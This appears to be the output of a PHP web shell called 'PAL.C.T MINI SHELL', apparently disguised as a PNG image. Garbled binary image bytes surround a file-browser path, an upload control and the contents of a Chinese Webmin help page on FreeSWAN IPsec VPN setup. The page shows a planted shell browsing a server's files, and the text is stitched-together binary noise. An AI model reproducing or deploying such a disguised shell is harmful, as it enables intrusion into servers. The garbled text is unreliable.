php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/ipsec/help/
upload
files >> //usr/libexec/webmin/ipsec/help/intro.zh_TW.auto.html

<header> IPsec VPN配置</header>該模塊允許您配置FreeSWAN,這是Linux的IPsec VPN協議的免費實現。 IPsec透明地加密了在兩個網絡之間傳輸的所有數據,並且與其他VPN協議不同,它使用了VPN的現有IP地址,而不是創建新的IP地址。它通常用於允許遠程客戶端通過Internet訪問私有內部LAN。 <p>為了使兩個系統使用IPsec進行通信,每個系統都必須定義一個包含IP地址,標識兩個系統的主機名,RSA密鑰和專用網絡(如果有)的連接。每個已配置的連接將在模塊主頁上顯示為一個圖標。通常,創建連接時輸入的配置詳細信息在兩個系統上都是相同的,只是交換了<b>本地</b>和<b>遠程</b>部分。每個要使用IPsec進行通信的主機都必須具有用於加密和身份驗證的公用/專用密鑰對。連接的每一端都必須知道另一端的公鑰,該公鑰可以存儲在連接設置中,也可以從DNS服務器中查找。此模塊的“ <b>顯示公共密鑰”</b>功能可用於顯示此主機的密鑰。 <p>與其他VPN協議相比,IPsec設置起來更為複雜,但更安全,更強大,並且被認為是行業標準。不幸的是,您可能會犯下許多配置錯誤,這些錯誤可能導致連接無法啟動,或者僅導致靜默地路由通信失敗。即使此模塊保護您免受簡單錯誤的侵擾,也無法使您免受更嚴重的概念問題的困擾。 <p><hr>在此模塊的主頁上,有任何現有IPsec連接的圖標以及用於創建新IPsec連接的鏈接,如果單擊它們,兩者都將帶您進入類似的連接詳細信息表格。它們下方是用於編輯全局設置(例如要使用的網絡接口)並顯示系統公鑰的圖標。 <p>如果您使用的是FreeSWAN版本2,則還將看到用於編輯各種策略文件的圖標,這些文件確定將對各種網絡使用哪種通信(加密或清除)。通常,這些參數可以保留不變,因為默認設置是盡可能加密。 <p>頁面底部附近是用於啟動或停止FreeSWAN服務器進程以及在其運行時應用當前設置的按鈕。除非服務器處於活動狀態,否則您的系統將無法建立或接收IPsec連接。此部分中的“ <b>啟動連接”</b>按鈕可用於強制建立IPsec隧道,該隧道在服務器啟動時不會自動啟動。 <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`